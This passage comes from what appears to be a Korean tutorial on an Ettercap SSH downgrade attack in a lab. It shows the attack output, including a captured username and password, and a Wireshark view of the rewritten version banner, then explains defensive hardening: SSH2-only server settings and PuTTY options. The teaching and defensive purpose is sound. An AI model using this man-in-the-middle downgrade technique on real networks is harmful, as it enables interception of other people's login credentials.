Putty๋ฅผ ์‹คํ–‰ํ•˜๊ณ  ์™ผ์ชฝ ๋ฉ”๋‰ด์—์„œ Session์„ ์„ ํƒํ•œ๋‹ค. SSH์„œ๋ฒ„์˜ IP์ฃผ์†Œ(์˜ˆ์ œ์—์„œ๋Š” 192.168.1.68์„ ์‚ฌ์šฉํ•˜๋„๋ก ํ•˜์˜€๋‹ค)๋ฅผ ์ž…๋ ฅํ•˜๊ณ  ์—ฐ๊ฒฐ ํƒ€์ž…์„ SSH๋กœ ๋ณ€๊ฒฝํ•œ๋‹ค. โ€œOpenโ€๋ฒ„ํŠผ์„ ํด๋ฆญํ•˜์—ฌ SSH ์„œ๋ฒ„๋กœ ์ ‘์†ํ•œ๋‹ค.

ettercap open ssh link with putty

์ด์ œ ๋ชจ๋“  ์ƒํ™ฉ์ด ์„ค์ •๋Œ€๋กœ ๋˜๋Š”์ง€ ํ™•์ธํ•œ๋‹ค. ํ•ด์ปคPC์—์„œ SSH1 ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ๋ฐ›๋Š”์ง€ ํ™•์ธํ•œ๋‹ค.

ettercap ssh1 downgrade filter credentials

์œ„์™€ ๊ฐ™์ด ๊ณต๊ฒฉ์ด ์„ฑ๊ณตํ•˜์˜€๋‹ค.

Ettercap์—์„œ SSH ๋ฒ„์ „์„ ๋‚ฎ์ถ”์—ˆ์œผ๋ฉฐ ๊ฐœ์ธ์ •๋ณด๋ฅผ ์ถ”์ถœํ•˜์˜€๋‹ค.
1. Downgraded the SSH version:
2. Captured the SSH1 credentials:
[SSH Filter] SSH downgraded from version 2 to 1
SSH : 192.168.1.68:22 -> USER:guillfab PASS:T0rduT1m
SSH์„œ๋ฒ„์—์„œWireshark๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ SSH๋งํฌ๊ฐ€ ์„ฑ๋ฆฝ์ด ๋˜๋Š” ์ˆœ์„œ๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. (ํด๋ฆญํ•˜์—ฌ ํฌ๊ฒŒ ๋ณผ ์ˆ˜ ์žˆ๋‹ค)

wireshark ssh1 initialisation process

1. ์„œ๋ฒ„(192.168.1.68)์€ ํด๋ผ์ด์–ธํŠธ(192.168.1.132)๋กœ SSH1๊ณผ SSH2๋ฅผ ์ง€์›ํ•œ๋‹ค๋Š” ๋ฉ”์‹œ์ง€์ธ โ€œ1.99โ€ ์‘๋‹ต์„ ๋ณด๋ƒˆ๋‹ค.
2. โ€œ1.99โ€ ์‘๋‹ต์€ ํ•ด์ปคPC์— ์˜ํ•ด โ€œ1.51โ€๋กœ ๋ณ€๊ฒฝ์ด ๋˜์—ˆ์œผ๋ฏ€๋กœ ํด๋ผ์ด์–ธํŠธ๋Š” SSH1 ๋งํฌ๋กœ ์—ฐ๊ฒฐ ์š”์ฒญ์„ ํ•œ๋‹ค.
3. ์•”ํ˜ธํ™”๋œ SSH1 ํŒจํ‚ท์ด๋‹ค.

---------------- ๋Œ€์‘์ฑ… ----------------

SSH downgrade ๊ณต๊ฒฉ์„ ํ”ผํ•  ์ˆ˜ ์žˆ๋Š” ๋ฐฉ๋ฒ•์€ ๋ฌด์—‡์ธ๊ฐ€?

SSH ์„œ๋ฒ„์—์„œ SSH1 ํ”„๋กœํ† ์ฝœ ํ—ˆ์šฉ์„ ๊ธˆ์ง€ ํ•ด์•ผ ํ•˜๋ฉฐ ํด๋ผ์ด์–ธํŠธ๋„ ๊ฐ•์ œ๋กœ SSH2 ํ”„๋กœํ† ์ฝœ์„ ์‚ฌ์šฉํ•˜๋„๋ก ํ•˜์—ฌ์•ผ ํ•œ๋‹ค.
OpenSSH ์„œ๋ฒ„๋Š” ๋””ํดํŠธ๋กœ SSHv2๋ฅผ ์‚ฌ์šฉํ•˜๋„๋ก ๋˜์–ด์žˆ๋‹ค. Putty ๊ฐ™์€ ํด๋ผ์ด์–ธํŠธ์—์„œ๋Š” SSH1๊ณผ SSH2๋ฅผ ๋ชจ๋‘ ์‚ฌ์šฉํ• ์ˆ˜ ์žˆ๋„๋ก ๋˜์–ด์žˆ๋Š” ๊ฒƒ์„ ์ž์ฃผ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.

SSH ์„œ๋ฒ„์™€ ํด๋ผ์ด์–ธํŠธ์—์„œ ๋ณด์•ˆ ๊ฐ•ํ™”์‹œํ‚ค๋Š” ๋ฐฉ๋ฒ•์„ ๋ณด๋„๋ก ํ•˜๊ฒ ๋‹ค.

SSH server:
/etc/ssh/sshd_config ํŒŒ์ผ์„ ์—ด์–ด์„œ SSH2 ํ”„๋กœํ† ์ฝœ๋งŒ ์‚ฌ์šฉํ•˜๋„๋ก ๋˜์–ด์žˆ๋Š”์ง€ ํ™•์ธํ•œ๋‹ค.

#vim /etc/ssh/sshd_config
Protocol 2
์„ค์ •ํŒŒ์ผ์„ ๋ณ€๊ฒฝํ•˜์˜€๋‹ค๋ฉด โ€œ/etc/init.d/ssh restartโ€ ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜์—ฌ ์„œ๋น„์Šค๋ฅผ ์žฌ์‹œ์ž‘ํ•˜์—ฌ์•ผ ํ•œ๋‹ค.
์„œ๋น„์Šค๋ฅผ ์žฌ์‹œ์ž‘ ํ–ˆ์œผ๋ฉด SSH2ํ”„๋กœํ† ์ฝœ๋งŒ ์ง€์›ํ•˜๋Š”์ง€ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ™•์ธํ•œ๋‹ค.

#telnet server_ip_address 22
Trying server_ip_address...
Connected to server_ip_address.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.6p1 Debian-5ubuntu0.1

๋นจ๊ฐ„์ƒ‰์œผ๋กœ ํ‘œ์‹œ๋˜๋Š” ๋ฒ„์ „ ์ •๋ณด์— 2.0์ด ํ‘œ์‹œ๋˜์–ด์•ผ ํ•œ๋‹ค.

SSH client:
ํด๋ผ์ด์–ธํŠธ์—์„œ๋„ SSH2 ํ”„๋กœํ† ์ฝœ์„ ๊ฐ•์ œ๋กœ ์‚ฌ์šฉํ•˜๋„๋ก ํ•œ๋‹ค.
Putty์˜ ์™ผ์ชฝ๋ฉ”๋‰ด์—์„œ โ€œConnectionโ€์„ ํด๋ฆญํ•˜๊ณ  โ€œSSHโ€๋ฅผ ์„ ํƒํ•œ๋‹ค. ์šฐ์ธก์— โ€œ2 onlyโ€ ๋ผ๋””์˜ค ๋ฒ„ํŠผ์„ ์„ ํƒํ•œ๋‹ค.

putty ssh2 version

Top of the page     Filter menu



์ „๋ฐ˜์ ์ธ ๋ณด์•ˆ ๊ทœ์น™์— ๋””ํดํŠธ ์„ค์ •์„ ์‚ฌ์šฉํ•˜์ง€ ์•Š๋Š” ๋ฒ„๋ฆ‡์ด ์ค‘์š”ํ•˜๋‹ค. ์„œ๋ฒ„์™€ ํด๋ผ์ด์–ธํŠธ ๋ชจ๋‘ ๋ณด์•ˆ ์„ค์ •์„ ์ตœ๋Œ€ํ•œ ๋†’์—ฌ์„œ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ด ์ค‘์š”ํ•˜๋‹ค.